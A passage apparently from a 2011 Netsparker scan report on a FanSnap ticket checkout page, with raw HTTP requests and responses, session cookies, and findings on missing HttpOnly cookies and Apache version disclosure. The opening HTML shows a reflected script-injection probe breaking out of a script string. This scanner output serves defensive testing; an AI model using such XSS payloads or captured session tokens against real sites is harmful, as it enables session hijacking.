id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', ''"--></style></script><script>netsparker(0x00003D)</script>:pgscheckout','','',{tag:''})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100728%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Identified Cookie

tvid

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode= HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=256; tvid=1342566973901825; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOhF0bXBfdmlzaXRfaWRp%2FEqvKPU6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVACzoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C9LweQBjoLb2Zmc2V0af6QnQ%3D%3D--d7b84757319ac1bb83921f8244de960874aa10b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:36:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 434
ETag: "d65b813808ca7d0be455a363bde9c418"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT,bg_vid=1342566973901825; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:36:01 GMT,bg_lvd=1311100561; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:36:01 GMT,_fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAWwUakAY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--83af7b97792f3e13a8806eb08cccfe6931a91928; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3681
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: -181883062, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-181883062%3A1342566973901825%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100561%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /checkout/index/418563179

/checkout/index/418563179

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Extracted Version

2.2.3 (CentOS)

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode= HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=256; tvid=1342566973901825; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOhF0bXBfdmlzaXRfaWRp%2FEqvKPU6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVACzoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C9LweQBjoLb2Zmc2V0af6QnQ%3D%3D--d7b84757319ac1bb83921f8244de960874aa10b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:36:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 434
ETag: "d65b813808ca7d0be455a363bde9c418"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT,bg_vid=1342566973901825; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:36:01 GMT,bg_lvd=1311100561; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:36:01 GMT,_fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMGZkMGE4NTc5Yjk0MDAxZjkwZjVjMjgwNmZjNTljODE6DmJnX3NyY19pZGkCAAE6CmJnX2xwSSIB%2F2h0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL2NoZWNrb3V0L2luZGV4LzQxODU2MzE3OT9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlM0E3OTI1JTNBcGdzdGlja2V0cwY6BkVGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAWwUakAY6C29mZnNldGn%2BkJ06EGJnX3Zpc2l0X2lkafxKryj1OhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2OTczOTAxODI1OhFiZ19zdHlsZV9pZHNJIgAGOwhG--83af7b97792f3e13a8806eb08cccfe6931a91928; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3681
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div 